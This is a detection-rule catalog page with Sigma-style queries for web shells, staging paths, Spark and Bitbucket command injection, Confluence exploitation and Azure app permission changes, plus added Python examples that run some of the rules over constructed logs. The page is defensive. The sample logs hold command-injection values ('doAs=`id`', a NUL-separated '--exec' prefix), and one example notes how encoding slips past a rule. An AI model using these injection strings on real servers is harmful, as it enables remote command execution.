12,786 vendor-native detections · ready to paste into your SIEM · cross-linked to ATT&CK
Detections
Antivirus Relevant File Paths Alerts
Detects an Antivirus alert in a highly relevant file path or with a relevant file name.
Do not dismiss this event just because the AV blocked the malware; investigate how the file got there in the first place.
Show query
any where (Filename like~ ("*:\\PerfLogs\\*", "*:\\Temp\\*", "*:\\Users\\Default\\*", "*:\\Users\\Public\\*", "*:\\Windows\\*", "*/www/*", "*\\inetpub\\*", "*\\tsclient\\*", "*apache*", "*nginx*", "*tomcat*", "*weblogic*")) or (Filename like~ ("*.asax", "*.ashx", "*.asmx", "*.asp", "*.aspx", "*.bat", "*.cfm", "*.cgi", "*.chm", "*.cmd", "*.dat", "*.ear", "*.gif", "*.hta", "*.jpeg", "*.jpg", "*.jsp", "*.jspx", "*.lnk", "*.msc", "*.php", "*.pl", "*.png", "*.ps1", "*.psm1", "*.py", "*.pyc", "*.rb", "*.scf", "*.sct", "*.sh", "*.svg", "*.txt", "*.vbe", "*.vbs", "*.war", "*.wll", "*.wsf", "*.wsh", "*.xll", "*.xml"))
Antivirus Relevant File Paths Alerts
Detects an Antivirus alert in a highly relevant file path or with a relevant file name.
Do not dismiss this event just because the AV blocked the malware; investigate how the file got there in the first place.
Show query
from * metadata _id, _index, _version | where Filename like "*:\\PerfLogs\\*" or Filename like "*:\\Temp\\*" or Filename like "*:\\Users\\Default\\*" or Filename like "*:\\Users\\Public\\*" or Filename like "*:\\Windows\\*" or Filename like "*/www/*" or Filename like "*\\inetpub\\*" or Filename like "*\\tsclient\\*" or Filename like "*apache*" or Filename like "*nginx*" or Filename like "*tomcat*" or Filename like "*weblogic*" or ends_with(Filename, ".asax") or ends_with(Filename, ".ashx") or ends_with(Filename, ".asmx") or ends_with(Filename, ".asp") or ends_with(Filename, ".aspx") or ends_with(Filename, ".bat") or ends_with(Filename, ".cfm") or ends_with(Filename, ".cgi") or ends_with(Filename, ".chm") or ends_with(Filename, ".cmd") or ends_with(Filename, ".dat") or ends_with(Filename, ".ear") or ends_with(Filename, ".gif") or ends_with(Filename, ".hta") or ends_with(Filename, ".jpeg") or ends_with(Filename, ".jpg") or ends_with(Filename, ".jsp") or ends_with(Filename, ".jspx") or ends_with(Filename, ".lnk") or ends_with(Filename, ".msc") or ends_with(Filename, ".php") or ends_with(Filename, ".pl") or ends_with(Filename, ".png") or ends_with(Filename, ".ps1") or ends_with(Filename, ".psm1") or ends_with(Filename, ".py") or ends_with(Filename, ".pyc") or ends_with(Filename, ".rb") or ends_with(Filename, ".scf") or ends_with(Filename, ".sct") or ends_with(Filename, ".sh") or ends_with(Filename, ".svg") or ends_with(Filename, ".txt") or ends_with(Filename, ".vbe") or ends_with(Filename, ".vbs") or ends_with(Filename, ".war") or ends_with(Filename, ".wll") or ends_with(Filename, ".wsf") or ends_with(Filename, ".wsh") or ends_with(Filename, ".xll") or ends_with(Filename, ".xml")
Antivirus Relevant File Paths Alerts
Detects an Antivirus alert in a highly relevant file path or with a relevant file name.
Do not dismiss this event just because the AV blocked the malware; investigate how the file got there in the first place.
Show query
(Filename:(*\:\\PerfLogs\\* OR *\:\\Temp\\* OR *\:\\Users\\Default\\* OR *\:\\Users\\Public\\* OR *\:\\Windows\\* OR *\/www\/* OR *\\inetpub\\* OR *\\tsclient\\* OR *apache* OR *nginx* OR *tomcat* OR *weblogic*)) OR (Filename:(*.asax OR *.ashx OR *.asmx OR *.asp OR *.aspx OR *.bat OR *.cfm OR *.cgi OR *.chm OR *.cmd OR *.dat OR *.ear OR *.gif OR *.hta OR *.jpeg OR *.jpg OR *.jsp OR *.jspx OR *.lnk OR *.msc OR *.php OR *.pl OR *.png OR *.ps1 OR *.psm1 OR *.py OR *.pyc OR *.rb OR *.scf OR *.sct OR *.sh OR *.svg OR *.txt OR *.vbe OR *.vbs OR *.war OR *.wll OR *.wsf OR *.wsh OR *.xll OR *.xml))
Antivirus Web Shell Detection
Detects a highly relevant Antivirus alert that reports a web shell.
It is highly recommended to tune this rule to the signature strings your antivirus product actually emits: download a large web shell repository (e.g. from GitHub), scan it with your AV, and check which of the resulting signature names the rule matches and which it misses.
Do not dismiss this event just because the AV blocked the malware; investigate how the file got there in the first place.
Show query
any where (Signature like~ ("ASP.*", "IIS/BackDoor*", "JAVA/Backdoor*", "JSP.*", "Perl.*", "PHP.*", "Troj/ASP*", "Troj/JSP*", "Troj/PHP*", "VBS/Uxor*")) or (Signature like~ ("*ASP_*", "*ASP:*", "*ASP.Agent*", "*ASP/*", "*Aspdoor*", "*ASPXSpy*", "*Backdoor.ASP*", "*Backdoor.Java*", "*Backdoor.JSP*", "*Backdoor.PHP*", "*Backdoor.VBS*", "*Backdoor/ASP*", "*Backdoor/Java*", "*Backdoor/JSP*", "*Backdoor/PHP*", "*Backdoor/VBS*", "*C99shell*", "*Chopper*", "*filebrowser*", "*JSP_*", "*JSP:*", "*JSP.Agent*", "*JSP/*", "*Perl:*", "*Perl/*", "*PHP_*", "*PHP:*", "*PHP.Agent*", "*PHP/*", "*PHPShell*", "*PShlSpy*", "*SinoChoper*", "*Trojan.ASP*", "*Trojan.JSP*", "*Trojan.PHP*", "*Trojan.VBS*", "*VBS.Agent*", "*VBS/Agent*", "*Webshell*"))
Antivirus Web Shell Detection
Detects a highly relevant Antivirus alert that reports a web shell.
It is highly recommended to tune this rule to the signature strings your antivirus product actually emits: download a large web shell repository (e.g. from GitHub), scan it with your AV, and check which of the resulting signature names the rule matches and which it misses.
Do not dismiss this event just because the AV blocked the malware; investigate how the file got there in the first place.
Show query
from * metadata _id, _index, _version | where starts_with(Signature, "ASP.") or starts_with(Signature, "IIS/BackDoor") or starts_with(Signature, "JAVA/Backdoor") or starts_with(Signature, "JSP.") or starts_with(Signature, "Perl.") or starts_with(Signature, "PHP.") or starts_with(Signature, "Troj/ASP") or starts_with(Signature, "Troj/JSP") or starts_with(Signature, "Troj/PHP") or starts_with(Signature, "VBS/Uxor") or Signature like "*ASP_*" or Signature like "*ASP:*" or Signature like "*ASP.Agent*" or Signature like "*ASP/*" or Signature like "*Aspdoor*" or Signature like "*ASPXSpy*" or Signature like "*Backdoor.ASP*" or Signature like "*Backdoor.Java*" or Signature like "*Backdoor.JSP*" or Signature like "*Backdoor.PHP*" or Signature like "*Backdoor.VBS*" or Signature like "*Backdoor/ASP*" or Signature like "*Backdoor/Java*" or Signature like "*Backdoor/JSP*" or Signature like "*Backdoor/PHP*" or Signature like "*Backdoor/VBS*" or Signature like "*C99shell*" or Signature like "*Chopper*" or Signature like "*filebrowser*" or Signature like "*JSP_*" or Signature like "*JSP:*" or Signature like "*JSP.Agent*" or Signature like "*JSP/*" or Signature like "*Perl:*" or Signature like "*Perl/*" or Signature like "*PHP_*" or Signature like "*PHP:*" or Signature like "*PHP.Agent*" or Signature like "*PHP/*" or Signature like "*PHPShell*" or Signature like "*PShlSpy*" or Signature like "*SinoChoper*" or Signature like "*Trojan.ASP*" or Signature like "*Trojan.JSP*" or Signature like "*Trojan.PHP*" or Signature like "*Trojan.VBS*" or Signature like "*VBS.Agent*" or Signature like "*VBS/Agent*" or Signature like "*Webshell*"
Antivirus Web Shell Detection
Detects a highly relevant Antivirus alert that reports a web shell.
It is highly recommended to tune this rule to the signature strings your antivirus product actually emits: download a large web shell repository (e.g. from GitHub), scan it with your AV, and check which of the resulting signature names the rule matches and which it misses.
Do not dismiss this event just because the AV blocked the malware; investigate how the file got there in the first place.
Show query
(Signature:(ASP.* OR IIS\/BackDoor* OR JAVA\/Backdoor* OR JSP.* OR Perl.* OR PHP.* OR Troj\/ASP* OR Troj\/JSP* OR Troj\/PHP* OR VBS\/Uxor*)) OR (Signature:(*ASP_* OR *ASP\:* OR *ASP.Agent* OR *ASP\/* OR *Aspdoor* OR *ASPXSpy* OR *Backdoor.ASP* OR *Backdoor.Java* OR *Backdoor.JSP* OR *Backdoor.PHP* OR *Backdoor.VBS* OR *Backdoor\/ASP* OR *Backdoor\/Java* OR *Backdoor\/JSP* OR *Backdoor\/PHP* OR *Backdoor\/VBS* OR *C99shell* OR *Chopper* OR *filebrowser* OR *JSP_* OR *JSP\:* OR *JSP.Agent* OR *JSP\/* OR *Perl\:* OR *Perl\/* OR *PHP_* OR *PHP\:* OR *PHP.Agent* OR *PHP\/* OR *PHPShell* OR *PShlSpy* OR *SinoChoper* OR *Trojan.ASP* OR *Trojan.JSP* OR *Trojan.PHP* OR *Trojan.VBS* OR *VBS.Agent* OR *VBS\/Agent* OR *Webshell*))
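Added example, not part of the catalog or of the Sigma project: the two antivirus rules above ("Antivirus Relevant File Paths Alerts" and "Antivirus Web Shell Detection") re-implemented in Python using the page's own pattern lists, run over constructed AV alerts, together with the tuning check the web shell rule's description asks for (which signature names from a scanned web shell corpus the rule would miss). File names and signature names in the sample are constructed for illustration and are not real vendor output; `triage` and `unmatched_webshell_signatures` are helper names chosen here.

```python
import re

# Pattern lists copied from the two rules above. In Sigma/EQL `like~` terms,
# '*' matches any run of characters and the comparison is case-insensitive.
AV_RELEVANT_PATHS = [
    "*:\\PerfLogs\\*", "*:\\Temp\\*", "*:\\Users\\Default\\*", "*:\\Users\\Public\\*",
    "*:\\Windows\\*", "*/www/*", "*\\inetpub\\*", "*\\tsclient\\*",
    "*apache*", "*nginx*", "*tomcat*", "*weblogic*",
]
AV_RELEVANT_EXTENSIONS = (
    ".asax", ".ashx", ".asmx", ".asp", ".aspx", ".bat", ".cfm", ".cgi", ".chm", ".cmd",
    ".dat", ".ear", ".gif", ".hta", ".jpeg", ".jpg", ".jsp", ".jspx", ".lnk", ".msc",
    ".php", ".pl", ".png", ".ps1", ".psm1", ".py", ".pyc", ".rb", ".scf", ".sct", ".sh",
    ".svg", ".txt", ".vbe", ".vbs", ".war", ".wll", ".wsf", ".wsh", ".xll", ".xml",
)
WEBSHELL_SIG_PREFIXES = (
    "ASP.", "IIS/BackDoor", "JAVA/Backdoor", "JSP.", "Perl.", "PHP.",
    "Troj/ASP", "Troj/JSP", "Troj/PHP", "VBS/Uxor",
)
WEBSHELL_SIG_SUBSTRINGS = (
    "ASP_", "ASP:", "ASP.Agent", "ASP/", "Aspdoor", "ASPXSpy",
    "Backdoor.ASP", "Backdoor.Java", "Backdoor.JSP", "Backdoor.PHP", "Backdoor.VBS",
    "Backdoor/ASP", "Backdoor/Java", "Backdoor/JSP", "Backdoor/PHP", "Backdoor/VBS",
    "C99shell", "Chopper", "filebrowser", "JSP_", "JSP:", "JSP.Agent", "JSP/",
    "Perl:", "Perl/", "PHP_", "PHP:", "PHP.Agent", "PHP/", "PHPShell", "PShlSpy",
    "SinoChoper", "Trojan.ASP", "Trojan.JSP", "Trojan.PHP", "Trojan.VBS",
    "VBS.Agent", "VBS/Agent", "Webshell",
)


def sigma_glob(pattern):
    """Compile a Sigma-style '*' wildcard pattern into an anchored, case-insensitive regex."""
    body = ".*".join(re.escape(part) for part in pattern.split("*"))
    return re.compile("^" + body + "$", re.IGNORECASE | re.DOTALL)


_PATH_MATCHERS = [sigma_glob(p) for p in AV_RELEVANT_PATHS]


def av_relevant_file(filename):
    """Rule 1: the detected file sits in a staging/web-server path or carries a script/web extension."""
    if any(rx.match(filename) for rx in _PATH_MATCHERS):
        return True
    return filename.lower().endswith(AV_RELEVANT_EXTENSIONS)


def av_webshell_signature(signature):
    """Rule 2: the AV signature name looks like a web shell family (prefix or substring match)."""
    low = signature.lower()
    if low.startswith(tuple(p.lower() for p in WEBSHELL_SIG_PREFIXES)):
        return True
    return any(s.lower() in low for s in WEBSHELL_SIG_SUBSTRINGS)


# Constructed AV alerts (not real telemetry); signature names are illustrative only.
SAMPLE_ALERTS = [
    {"Filename": "C:\\inetpub\\wwwroot\\images\\cmd.aspx", "Signature": "Backdoor:ASP/Chopper.A"},
    {"Filename": "/var/www/html/wp-content/uploads/c99.php", "Signature": "PHP/C99shell.A"},
    {"Filename": "C:\\Users\\Public\\update.ps1", "Signature": "Trojan:PowerShell/Downloader.Gen"},
    {"Filename": "C:\\Users\\bob\\Downloads\\setup.exe", "Signature": "Trojan:Win32/Emotet"},
]


def triage(alerts):
    """Return (filename, hit on rule 1, hit on rule 2) for each alert."""
    return [(a["Filename"], av_relevant_file(a["Filename"]), av_webshell_signature(a["Signature"]))
            for a in alerts]


def unmatched_webshell_signatures(signature_names):
    """Tuning helper for rule 2: feed in the signature names your AV produced when scanning a
    web shell corpus; whatever comes back is a name the rule would silently miss."""
    return sorted(s for s in set(signature_names) if not av_webshell_signature(s))


if __name__ == "__main__":
    for row in triage(SAMPLE_ALERTS):
        print(row)
    print(unmatched_webshell_signatures(["Troj/WebShel-A", "Backdoor:ASP/Chopper.A"]))
```

The third sample alert shows why both rules are kept separate: a PowerShell downloader dropped in C:\Users\Public trips the path rule but says nothing about web shells, while the first two trip both. Run `unmatched_webshell_signatures` over the real names your AV emitted for a scanned corpus and add any misses (here the constructed "Troj/WebShel-A") to the signature list.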
Apache Segmentation Fault
Detects a segmentation fault error message caused by a crashing Apache worker process; repeated worker crashes can indicate memory-corruption exploitation attempts against Apache or one of its loaded modules.
Show query
any where "exit signal Segmentation Fault"
Apache Segmentation Fault
Detects a segmentation fault error message caused by a crashing Apache worker process; repeated worker crashes can indicate memory-corruption exploitation attempts against Apache or one of its loaded modules.
Show query
*exit\ signal\ Segmentation\ Fault*
Apache Spark Shell Command Injection - ProcessCreation
Detects attempts to exploit an Apache Spark server via CVE-2022-33891 (shell command injection through the Spark UI's doAs parameter, which is interpolated into an "id -Gn" shell command) from a process creation perspective
Show query
any where (ParentImage like~ ("*/bash", "*\\bash")) and (CommandLine like~ ("*id -Gn `*", "*id -Gn '*"))
Apache Spark Shell Command Injection - ProcessCreation
Detects attempts to exploit an Apache Spark server via CVE-2022-33891 (shell command injection through the Spark UI's doAs parameter, which is interpolated into an "id -Gn" shell command) from a process creation perspective
Show query
from * metadata _id, _index, _version | where (ends_with(ParentImage, "/bash") or ends_with(ParentImage, "\\bash")) and (CommandLine like "*id -Gn `*" or CommandLine like "*id -Gn '*")
Apache Spark Shell Command Injection - ProcessCreation
Detects attempts to exploit an Apache Spark server via CVE-2022-33891 (shell command injection through the Spark UI's doAs parameter, which is interpolated into an "id -Gn" shell command) from a process creation perspective
Show query
ParentImage:(*\/bash OR *\\bash) AND (CommandLine:(*id\ \-Gn\ `* OR *id\ \-Gn\ '*))
Apache Spark Shell Command Injection - Weblogs
Detects attempts to exploit an Apache Spark server via CVE-2022-33891 (shell command injection through the Spark UI's doAs parameter) from a web log perspective; note that the pattern only matches when doAs is the first query parameter
Show query
any where cs-uri-query:"*?doAs=`*"
Apache Spark Shell Command Injection - Weblogs
Detects attempts to exploit an Apache Spark server via CVE-2022-33891 (shell command injection through the Spark UI's doAs parameter) from a web log perspective; note that the pattern only matches when doAs is the first query parameter
Show query
from * metadata _id, _index, _version | where `cs-uri-query` like "*?doAs=`*"
Apache Spark Shell Command Injection - Weblogs
Detects attempts to exploit an Apache Spark server via CVE-2022-33891 (shell command injection through the Spark UI's doAs parameter) from a web log perspective; note that the pattern only matches when doAs is the first query parameter
Show query
cs-uri-query:*?doAs\=`*
App Granted Microsoft Permissions
Detects when an application is granted delegated or app role permissions for Microsoft Graph, Exchange, SharePoint, or Azure AD
Show query
any where properties.message like~ ("Add delegated permission grant", "Add app role assignment to service principal")
App Granted Microsoft Permissions
Detects when an application is granted delegated or app role permissions for Microsoft Graph, Exchange, SharePoint, or Azure AD
Show query
from * metadata _id, _index, _version | where properties.message in ("Add delegated permission grant", "Add app role assignment to service principal")
App Granted Microsoft Permissions
Detects when an application is granted delegated or app role permissions for Microsoft Graph, Exchange, SharePoint, or Azure AD
Show query
properties.message:(Add\ delegated\ permission\ grant OR Add\ app\ role\ assignment\ to\ service\ principal)
App Granted Privileged Delegated Or App Permissions
Detects when an administrator grants an application either application permissions (app roles) or highly privileged delegated permissions
Show query
any where properties.message:"Add app role assignment to service principal"
App Granted Privileged Delegated Or App Permissions
Detects when an administrator grants an application either application permissions (app roles) or highly privileged delegated permissions
Show query
from * metadata _id, _index, _version | where properties.message=="Add app role assignment to service principal"
App Granted Privileged Delegated Or App Permissions
Detects when an administrator grants an application either application permissions (app roles) or highly privileged delegated permissions
Show query
properties.message:Add\ app\ role\ assignment\ to\ service\ principal
Elastic
Converted
EQL
high
AppX Located in Known Staging Directory Added to Deployment Pipeline
Detects an appx package that was added to the pipeline of the "to be processed" packages that is located in a known folder often used as a staging directory.
Show query
any where EventID:854 and ((Path like~ ("*:/Perflogs/*", "*:/Users/Public/*", "*:/Windows/Temp/*", "*/AppData/Local/Temp/*", "*/Desktop/*", "*/Downloads/*")) or (Path like~ ("*:\\PerfLogs\\*", "*:\\Users\\Public\\*", "*:\\Windows\\Temp\\*", "*\\AppData\\Local\\Temp\\*", "*\\Desktop\\*", "*\\Downloads\\*")))
Elastic
Converted
ES|QL
high
AppX Located in Known Staging Directory Added to Deployment Pipeline
Detects an appx package that was added to the pipeline of the "to be processed" packages that is located in a known folder often used as a staging directory.
Show query
from * metadata _id, _index, _version | where EventID==854 and (Path like "*:/Perflogs/*" or Path like "*:/Users/Public/*" or Path like "*:/Windows/Temp/*" or Path like "*/AppData/Local/Temp/*" or Path like "*/Desktop/*" or Path like "*/Downloads/*" or Path like "*:\\PerfLogs\\*" or Path like "*:\\Users\\Public\\*" or Path like "*:\\Windows\\Temp\\*" or Path like "*\\AppData\\Local\\Temp\\*" or Path like "*\\Desktop\\*" or Path like "*\\Downloads\\*")
Elastic
Converted
Lucene
high
AppX Located in Known Staging Directory Added to Deployment Pipeline
Detects an appx package that was added to the pipeline of the "to be processed" packages that is located in a known folder often used as a staging directory.
Show query
EventID:854 AND ((Path:(*\:\/Perflogs\/* OR *\:\/Users\/Public\/* OR *\:\/Windows\/Temp\/* OR *\/AppData\/Local\/Temp\/* OR *\/Desktop\/* OR *\/Downloads\/*)) OR (Path:(*\:\\PerfLogs\\* OR *\:\\Users\\Public\\* OR *\:\\Windows\\Temp\\* OR *\\AppData\\Local\\Temp\\* OR *\\Desktop\\* OR *\\Downloads\\*)))
Application AppID Uri Configuration Changes
Detects when a configuration change is made to an application's AppID URI.
Show query
any where properties.message like~ ("Update Application", "Update Service principal")
Application AppID Uri Configuration Changes
Detects when a configuration change is made to an application's AppID URI.
Show query
from * metadata _id, _index, _version | where properties.message in ("Update Application", "Update Service principal")
Application AppID Uri Configuration Changes
Detects when a configuration change is made to an application's AppID URI.
Show query
properties.message:(Update\ Application OR Update\ Service\ principal)
Application URI Configuration Changes
Detects when a configuration change is made to an application's URI.
Investigate URIs for domain names that no longer exist (dangling URIs), URIs not using HTTPS, wildcards at the end of the domain, URIs that are not unique to that app, and URIs that point to domains you do not control.
Show query
any where properties.message:"Update Application Sucess- Property Name AppAddress"
Application URI Configuration Changes
Detects when a configuration change is made to an application's URI.
Investigate URIs for domain names that no longer exist (dangling URIs), URIs not using HTTPS, wildcards at the end of the domain, URIs that are not unique to that app, and URIs that point to domains you do not control.
Show query
from * metadata _id, _index, _version | where properties.message=="Update Application Sucess- Property Name AppAddress"
Application URI Configuration Changes
Detects when a configuration change is made to an application's URI.
Investigate URIs for domain names that no longer exist (dangling URIs), URIs not using HTTPS, wildcards at the end of the domain, URIs that are not unique to that app, and URIs that point to domains you do not control.
Show query
properties.message:Update\ Application\ Sucess\-\ Property\ Name\ AppAddress
Arbitrary File Download Via IMEWDBLD.EXE
Detects usage of "IMEWDBLD.exe" (the Microsoft IME dictionary updater, a living-off-the-land binary) to download arbitrary files
Show query
any where (Image:"*\\IMEWDBLD.exe" or OriginalFileName:"imewdbld.exe") and (CommandLine like~ ("*http://*", "*https://*"))
Arbitrary File Download Via IMEWDBLD.EXE
Detects usage of "IMEWDBLD.exe" (the Microsoft IME dictionary updater, a living-off-the-land binary) to download arbitrary files
Show query
from * metadata _id, _index, _version | where (ends_with(Image, "\\IMEWDBLD.exe") or OriginalFileName=="imewdbld.exe") and (CommandLine like "*http://*" or CommandLine like "*https://*")
Arbitrary File Download Via IMEWDBLD.EXE
Detects usage of "IMEWDBLD.exe" (the Microsoft IME dictionary updater, a living-off-the-land binary) to download arbitrary files
Show query
(Image:*\\IMEWDBLD.exe OR OriginalFileName:imewdbld.exe) AND (CommandLine:(*http\:\/\/* OR *https\:\/\/*))
Aruba Network Service Potential DLL Sideloading
Detects potential DLL sideloading activity via the Aruba Networks Virtual Intranet Access "arubanetsvc.exe" process using DLL Search Order Hijacking
Show query
any where (Image:"*\\arubanetsvc.exe" and (ImageLoaded like~ ("*\\wtsapi32.dll", "*\\msvcr100.dll", "*\\msvcp100.dll", "*\\dbghelp.dll", "*\\dbgcore.dll", "*\\wininet.dll", "*\\iphlpapi.dll", "*\\version.dll", "*\\cryptsp.dll", "*\\cryptbase.dll", "*\\wldp.dll", "*\\profapi.dll", "*\\sspicli.dll", "*\\winsta.dll", "*\\dpapi.dll"))) and (not (ImageLoaded like~ ("C:\\Windows\\System32\\*", "C:\\Windows\\SysWOW64\\*", "C:\\Windows\\WinSxS\\*")))
Aruba Network Service Potential DLL Sideloading
Detects potential DLL sideloading activity via the Aruba Networks Virtual Intranet Access "arubanetsvc.exe" process using DLL Search Order Hijacking
Show query
from * metadata _id, _index, _version | where ends_with(Image, "\\arubanetsvc.exe") and (ends_with(ImageLoaded, "\\wtsapi32.dll") or ends_with(ImageLoaded, "\\msvcr100.dll") or ends_with(ImageLoaded, "\\msvcp100.dll") or ends_with(ImageLoaded, "\\dbghelp.dll") or ends_with(ImageLoaded, "\\dbgcore.dll") or ends_with(ImageLoaded, "\\wininet.dll") or ends_with(ImageLoaded, "\\iphlpapi.dll") or ends_with(ImageLoaded, "\\version.dll") or ends_with(ImageLoaded, "\\cryptsp.dll") or ends_with(ImageLoaded, "\\cryptbase.dll") or ends_with(ImageLoaded, "\\wldp.dll") or ends_with(ImageLoaded, "\\profapi.dll") or ends_with(ImageLoaded, "\\sspicli.dll") or ends_with(ImageLoaded, "\\winsta.dll") or ends_with(ImageLoaded, "\\dpapi.dll")) and not (starts_with(ImageLoaded, "C:\\Windows\\System32\\") or starts_with(ImageLoaded, "C:\\Windows\\SysWOW64\\") or starts_with(ImageLoaded, "C:\\Windows\\WinSxS\\"))
Aruba Network Service Potential DLL Sideloading
Detects potential DLL sideloading activity via the Aruba Networks Virtual Intranet Access "arubanetsvc.exe" process using DLL Search Order Hijacking
Show query
(Image:*\\arubanetsvc.exe AND (ImageLoaded:(*\\wtsapi32.dll OR *\\msvcr100.dll OR *\\msvcp100.dll OR *\\dbghelp.dll OR *\\dbgcore.dll OR *\\wininet.dll OR *\\iphlpapi.dll OR *\\version.dll OR *\\cryptsp.dll OR *\\cryptbase.dll OR *\\wldp.dll OR *\\profapi.dll OR *\\sspicli.dll OR *\\winsta.dll OR *\\dpapi.dll))) AND (NOT (ImageLoaded:(C\:\\Windows\\System32\\* OR C\:\\Windows\\SysWOW64\\* OR C\:\\Windows\\WinSxS\\*)))
Atera Agent Installation
Detects successful installation of the Atera Remote Monitoring & Management (RMM) agent, which has been observed being deployed by Conti ransomware operators
Show query
any where EventID:1033 and Provider_Name:"MsiInstaller" and Message:"*AteraAgent*"
Atera Agent Installation
Detects successful installation of the Atera Remote Monitoring & Management (RMM) agent, which has been observed being deployed by Conti ransomware operators
Show query
from * metadata _id, _index, _version | where EventID==1033 and Provider_Name=="MsiInstaller" and Message like "*AteraAgent*"
Atera Agent Installation
Detects successful installation of the Atera Remote Monitoring & Management (RMM) agent, which has been observed being deployed by Conti ransomware operators
Show query
EventID:1033 AND Provider_Name:MsiInstaller AND Message:*AteraAgent*
Atlassian Bitbucket Command Injection Via Archive API
Detects attempts to exploit the Atlassian Bitbucket command injection vulnerability CVE-2022-36804 through the archive REST API (a null byte followed by "--exec" injected via the prefix parameter)
Show query
any where cs-uri-query:"*/rest/api/latest/projects/*" and cs-uri-query:"*prefix=*" and cs-uri-query:"*%00--exec*"
Atlassian Bitbucket Command Injection Via Archive API
Detects attempts to exploit the Atlassian Bitbucket command injection vulnerability CVE-2022-36804 through the archive REST API (a null byte followed by "--exec" injected via the prefix parameter)
Show query
from * metadata _id, _index, _version | where `cs-uri-query` like "*/rest/api/latest/projects/*" and `cs-uri-query` like "*prefix=*" and `cs-uri-query` like "*%00--exec*"
Atlassian Bitbucket Command Injection Via Archive API
Detects attempts to exploit the Atlassian Bitbucket command injection vulnerability CVE-2022-36804 through the archive REST API (a null byte followed by "--exec" injected via the prefix parameter)
Show query
cs-uri-query:*\/rest\/api\/latest\/projects\/* AND cs-uri-query:*prefix\=* AND cs-uri-query:*%00\-\-exec*
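Added example, not part of the catalog or of the Sigma project: the two web log rules above ("Apache Spark Shell Command Injection - Weblogs" and "Atlassian Bitbucket Command Injection Via Archive API") run in Python over constructed access log lines. The parser handles the Apache/nginx combined log format and exposes the full request target as `cs-uri-query`, which is how Sigma webserver rules use that field (it is why the Bitbucket rule can match both a path and a query parameter in one field). The sample lines and client addresses are constructed, not real traffic, and `scan`, `parse_combined` and the `*_broad` function are names chosen here. The broad Spark check goes beyond the page's rule on purpose: it percent-decodes the request and accepts doAs anywhere in the query string, so the third sample line shows a request the catalog's literal pattern misses.

```python
import re
from urllib.parse import unquote

# Apache/nginx "combined" format: client ident user [time] "method target proto" status bytes
COMBINED_RE = re.compile(r'^(\S+) \S+ \S+ \[[^\]]+\] "(\S+) (\S+) (\S+)" (\d{3}) \S+')


def parse_combined(line):
    """Return a dict with c-ip, cs-method, cs-uri-query, sc-status, or None if the line does not parse.
    cs-uri-query carries the full request target (path and query string), as Sigma webserver rules expect."""
    m = COMBINED_RE.match(line)
    if not m:
        return None
    return {"c-ip": m.group(1), "cs-method": m.group(2),
            "cs-uri-query": m.group(3), "sc-status": int(m.group(5))}


def rule_spark_doas(uri):
    """The page's rule as written: literal '?doAs=`', so doAs must be the first parameter."""
    return "?doas=`" in uri.lower()


def rule_spark_doas_broad(uri):
    """Broadened variant (added here): decode percent-encoding, accept doAs at any position and
    flag backtick, '$', ';' or '|' in its value, since the value lands inside a bash -c command."""
    return re.search(r"[?&]doAs=[^&]*[`;|$]", unquote(uri), re.IGNORECASE) is not None


def rule_bitbucket_archive(uri):
    """The page's CVE-2022-36804 rule: archive endpoint, prefix= parameter, encoded NUL then --exec."""
    low = uri.lower()
    return "/rest/api/latest/projects/" in low and "prefix=" in low and "%00--exec" in low


RULES = {
    "spark_doas": rule_spark_doas,
    "spark_doas_broad": rule_spark_doas_broad,
    "bitbucket_archive": rule_bitbucket_archive,
}


def scan(log_text):
    """Return (line number, rule name) for every rule hit in the log text."""
    hits = []
    for n, line in enumerate(log_text.splitlines(), 1):
        rec = parse_combined(line)
        if rec is None:
            continue
        for name, fn in RULES.items():
            if fn(rec["cs-uri-query"]):
                hits.append((n, name))
    return hits


# Constructed access log (not real traffic). Line 2 is the textbook Spark request, line 3 the same
# injection with doAs as the second parameter and the backticks percent-encoded, line 5 a Bitbucket
# archive request with the NUL-separated --exec argument, lines 1 and 4 are benign.
SAMPLE_LOG = """\
203.0.113.7 - - [01/May/2024:10:00:01 +0000] "GET /jobs/?id=3 HTTP/1.1" 200 8120
203.0.113.7 - - [01/May/2024:10:00:02 +0000] "GET /jobs/?doAs=`id` HTTP/1.1" 200 8120
203.0.113.7 - - [01/May/2024:10:00:03 +0000] "GET /jobs/?id=3&doAs=%60id%60 HTTP/1.1" 200 8120
198.51.100.9 - - [01/May/2024:10:05:00 +0000] "GET /rest/api/latest/projects/PROJ/repos/app/archive?format=zip HTTP/1.1" 200 51200
198.51.100.9 - - [01/May/2024:10:05:09 +0000] "GET /rest/api/latest/projects/PROJ/repos/app/archive?prefix=ax%00--exec=%60id%60%00--remote=origin HTTP/1.1" 200 420
"""

if __name__ == "__main__":
    for hit in scan(SAMPLE_LOG):
        print(hit)
```

Line 3 fires only the broadened check, which is the caveat to keep in mind when pasting the catalog's literal pattern: an attacker who reorders or encodes the parameters slips past "*?doAs=`*" while the server still evaluates the injected command.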
Atlassian Confluence CVE-2022-26134
Detects spawning of suspicious child processes by Atlassian Confluence server which may indicate successful exploitation of CVE-2022-26134
Show query
any where ParentImage:"/opt/atlassian/confluence/*" and ParentImage:"*/java" and (CommandLine like~ ("*/bin/sh*", "*bash*", "*dash*", "*ksh*", "*zsh*", "*csh*", "*fish*", "*curl*", "*wget*", "*python*"))
Atlassian Confluence CVE-2022-26134
Detects spawning of suspicious child processes by Atlassian Confluence server which may indicate successful exploitation of CVE-2022-26134
Show query
from * metadata _id, _index, _version | where starts_with(ParentImage, "/opt/atlassian/confluence/") and ends_with(ParentImage, "/java") and (CommandLine like "*/bin/sh*" or CommandLine like "*bash*" or CommandLine like "*dash*" or CommandLine like "*ksh*" or CommandLine like "*zsh*" or CommandLine like "*csh*" or CommandLine like "*fish*" or CommandLine like "*curl*" or CommandLine like "*wget*" or CommandLine like "*python*")
Atlassian Confluence CVE-2022-26134
Detects spawning of suspicious child processes by Atlassian Confluence server which may indicate successful exploitation of CVE-2022-26134
Show query
ParentImage:\/opt\/atlassian\/confluence\/* AND ParentImage:*\/java AND (CommandLine:(*\/bin\/sh* OR *bash* OR *dash* OR *ksh* OR *zsh* OR *csh* OR *fish* OR *curl* OR *wget* OR *python*))
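Added example, not part of the catalog or of the Sigma project: the two Linux process creation rules on this page ("Atlassian Confluence CVE-2022-26134" above and "Apache Spark Shell Command Injection - ProcessCreation" earlier) evaluated in Python over constructed Sysmon-for-Linux-style events. The events, paths and addresses are constructed for illustration; `evaluate` and the rule function names are chosen here. The last event is included to show a side effect of the Confluence rule's substring tokens: "*dash*" also matches "dashboard", so a benign child of the Confluence JVM with that word on its command line fires too.

```python
# Constructed process creation events (ParentImage, Image, CommandLine), not real telemetry.
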